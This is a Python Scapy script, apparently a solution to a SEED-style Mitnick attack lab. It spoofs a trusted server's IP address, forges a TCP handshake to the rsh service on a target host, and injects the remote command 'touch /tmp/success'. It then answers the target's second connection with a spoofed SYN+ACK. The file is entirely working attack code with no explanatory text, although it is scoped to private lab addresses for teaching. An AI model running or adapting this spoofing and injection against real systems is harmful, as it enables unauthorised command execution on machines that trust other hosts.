57 lines
2.2 KiB
Python
57 lines
2.2 KiB
Python
#!/usr/bin/python3
|
|
from scapy.all import *
|
|
|
|
X_IP = "10.9.0.5"
|
|
SRV_IP = "10.9.0.6"
|
|
X_PORT = 514
|
|
SRV_PORT = 1023
|
|
SECOND_PORT = 1022
|
|
|
|
def attack():
|
|
my_seq = 0x12345678
|
|
|
|
# Send SYN
|
|
print("Sending SYN...")
|
|
ip = IP(src=SRV_IP, dst=X_IP)
|
|
tcp = TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
|
|
send(ip/tcp, verbose=0)
|
|
|
|
def handle_pkt(pkt):
|
|
nonlocal my_seq
|
|
if pkt.haslayer(TCP):
|
|
# Handshake for first connection
|
|
if pkt[TCP].flags == "SA" and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT:
|
|
print(f"Received SYN+ACK for first connection (Seq: {pkt[TCP].seq})")
|
|
# Send ACK
|
|
ack_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
|
TCP(sport=SRV_PORT, dport=X_PORT, flags="A",
|
|
seq=my_seq + 1, ack=pkt[TCP].seq + 1)
|
|
send(ack_pkt, verbose=0)
|
|
|
|
# Send Data
|
|
data = f"{SECOND_PORT}\x00seed\x00seed\x00touch /tmp/success\x00"
|
|
data_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
|
TCP(sport=SRV_PORT, dport=X_PORT, flags="PA",
|
|
seq=my_seq + 1, ack=pkt[TCP].seq + 1) / data
|
|
print("Sending Data...")
|
|
send(data_pkt, verbose=0)
|
|
|
|
# Handshake for second connection
|
|
elif pkt[TCP].flags == "S" and pkt[IP].src == X_IP and pkt[TCP].dport == SECOND_PORT:
|
|
print(f"Received SYN for second connection (Seq: {pkt[TCP].seq})")
|
|
# Send SYN+ACK
|
|
srv_seq = 0x87654321
|
|
sa_pkt = IP(src=SRV_IP, dst=X_IP) / \
|
|
TCP(sport=SECOND_PORT, dport=pkt[TCP].sport, flags="SA",
|
|
seq=srv_seq, ack=pkt[TCP].seq + 1)
|
|
send(sa_pkt, verbose=0)
|
|
print("Sent SYN+ACK for second connection")
|
|
# We should also acknowledge the final ACK from X-Terminal if needed,
|
|
# but rsh might proceed anyway.
|
|
return False
|
|
|
|
sniff(iface="br-63cae30f0395", filter=f"tcp and host {X_IP}", prn=handle_pkt, timeout=15)
|
|
|
|
if __name__ == "__main__":
|
|
attack()
|